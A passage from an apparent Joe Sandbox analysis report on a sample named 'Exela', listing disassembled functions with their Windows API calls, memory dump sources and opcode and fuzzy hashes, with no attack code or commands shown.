                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                    • Instruction ID: 6d79647a6174d8ed0cfcc5369f20650a4ce3914ca626938b546aec1e19bdeabb
                                                                                                    • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                    • Instruction Fuzzy Hash: 2C110461718B6181EA10BB65A809069A361FF81BF4F9C4371EE7D4B7D8CE3CD4018700
                                                                                                    Function 00007FF75AEA5994 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75AEA58A9), ref: 00007FF75AEA59C7
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75AEA58A9), ref: 00007FF75AEA59DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$System$FileLocalSpecific
                                                                                                    • String ID:
                                                                                                    • API String ID: 1707611234-0
                                                                                                    • Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
                                                                                                    • Instruction ID: b6d72656a81f60ed81c0595009102228537d794fc3ae94f5c70c479b3c85ebab
                                                                                                    • Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
                                                                                                    • Instruction Fuzzy Hash: 36118F3261C72282FB54BB11A45613AF760FF84761F940275EAAD859E8EF6CD415CB20
                                                                                                    Function 00007FF75AEAA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 485612231-0
                                                                                                    • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                    • Instruction ID: 3ba9d389facac25f79b385da1513dc1d9f226e2729bddc8d2a4f4d0838436265
                                                                                                    • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                    • Instruction Fuzzy Hash: 6EE04F50E0831642FF187BB2A45B13891906F84741B8C81B4C91D462A1DE2C68858220
                                                                                                    Function 00007FF75AEAABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF75AEAAA45,?,?,00000000,00007FF75AEAAAFA), ref: 00007FF75AEAAC36
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEAAA45,?,?,00000000,00007FF75AEAAAFA), ref: 00007FF75AEAAC40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 918212764-0
                                                                                                    • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                    • Instruction ID: 477d21ec7612bd668772126a739409cb2da3a58a0e2e06d1601d3fed8709d5b9
                                                                                                    • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                    • Instruction Fuzzy Hash: 3121A821F1C76242FFA47761A45B27D96829F84790FCC42B9EA2E477D1CE6CE4858320
                                                                                                    Function 00007FF75AEABF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                    • Instruction ID: c1988d28e1002e279d4d484cac0a04103f6ece80cb91bd8ce46e33ab9a492427
                                                                                                    • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                    • Instruction Fuzzy Hash: 8341F532A0821187FA34BB55E55A279F3A0EF55B40F9C4171EA8E87691CF2DE802CB61
                                                                                                    Function 00007FF75AE97F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 840049012-0
                                                                                                    • Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                    • Instruction ID: 0161e380bada3dc8dbcb64a249062d881bad0c31413e3b9cded1b703a1518053
                                                                                                    • Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                    • Instruction Fuzzy Hash: 97219121B087728AFA10BA126516BFAEA51BF45BD4FCC5470EE4D07786CE7EE041C720
                                                                                                    Function 00007FF75AEAB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                    • Instruction ID: 7522892212e0090d612d09d23144962a1362839e067a0f634cb4ac9389392f4a
                                                                                                    • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                    • Instruction Fuzzy Hash: D031BE32A1866286F7517B55984B37CAA60AF40BA4FCA51B5EA2D033D2CF7CE8418731
                                                                                                    Function 00007FF75AEA99D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3947729631-0
                                                                                                    • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                    • Instruction ID: e7df6162451b1382e36028372662225ca7eee501c22f31b918b78909dd21ca01
                                                                                                    • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                    • Instruction Fuzzy Hash: 66218E32A047968AFB24BF64C44A2FC73A0EF44718F88467AD62D06AD5DF38D584C760
                                                                                                    Function 00007FF75AEA6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                    • Instruction ID: dfc57e5b18331b03d02219bf6d1de5abfb095ae863bf1f6fff83102600040cec
                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                    • Instruction Fuzzy Hash: B4116326A1C66282FA60BF51A40627EE2A4BF45B80FDC40B1FB4C57B96DF3DD5418730
                                                                                                    Function 00007FF75AEB63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                    • Instruction ID: 1436b58a24f9e5537ebd7dd05e69ea6343ea388c359d5b3516914feeb88a895c
                                                                                                    • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                    • Instruction Fuzzy Hash: 1921B372608B9686E761BF18E446379B6A0FF85B54F984334E79D476D5DF3CD8008B10
                                                                                                    Function 00007FF75AEA042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                    • Instruction ID: 30ad2407d49361679c6fa5feb80e9bad6b5d3437141dd04d202c49cf9c38207d
                                                                                                    • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                    • Instruction Fuzzy Hash: 1101C462A0876241FA05FF529907069E791BF85FE0F8C46B1EE5C17BD6CE3CE5014320
                                                                                                    Function 00007FF75AEA7F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                    • Instruction ID: 843bb7ab68cefad79fa2dfa46c7e5d33109dcae8ab8d6ec7794bdac5aac5c051
                                                                                                    • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                    • Instruction Fuzzy Hash: 52019E24E0D2B344FEA0BB21654B179E692AF447D0FDC42B9EA1D827C6DF3CA9418231
                                                                                                    Function 00007FF75AEA82A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                    • Instruction ID: dcb3a3c0898009eba09d65c44cca7bff6b55846c50aade6d3e136ea8aa101ce3
                                                                                                    • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                    • Instruction Fuzzy Hash: 38E0C2A4E0872383F7503AB8048B17998504F65340FCCA4F0EA09062C3DE2C68588231
                                                                                                    Function 00007FF75AEAEC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF75AEAB39A,?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA), ref: 00007FF75AEAEC5D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 4292702814-0
                                                                                                    • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                    • Instruction ID: 06fd9e8dec647564c60a7775a400b05f1288136303301470a0a986602ca0cb30
                                                                                                    • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                    • Instruction Fuzzy Hash: 12F01D54B0937B81FF547A6658AB2B5D2905F84F80FCC65B0C90E863D2DE2CE8818230
                                                                                                    Function 00007FF75AEAD66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF75AEA0D00,?,?,?,00007FF75AEA236A,?,?,?,?,?,00007FF75AEA3B59), ref: 00007FF75AEAD6AA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 4292702814-0
                                                                                                    • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                    • Instruction ID: f1ca97cceb2b0feb5b193fc190cc7dd06fa3024616b0bb6e8c5d08149bd0e355
                                                                                                    • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                    • Instruction Fuzzy Hash: 92F05820F0932785FE647761589B3B892904F94BA0F8C43B0DD2E853C2DE2CE8808230

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FF75AE95820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95830
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95842
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95879
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9588B
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958A4
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958B6
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958CF
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958E1
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE958FD
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9590F
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9592B
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9593D
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE95959
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE964BF,?,00007FF75AE9336E), ref: 00007FF75AE9596B
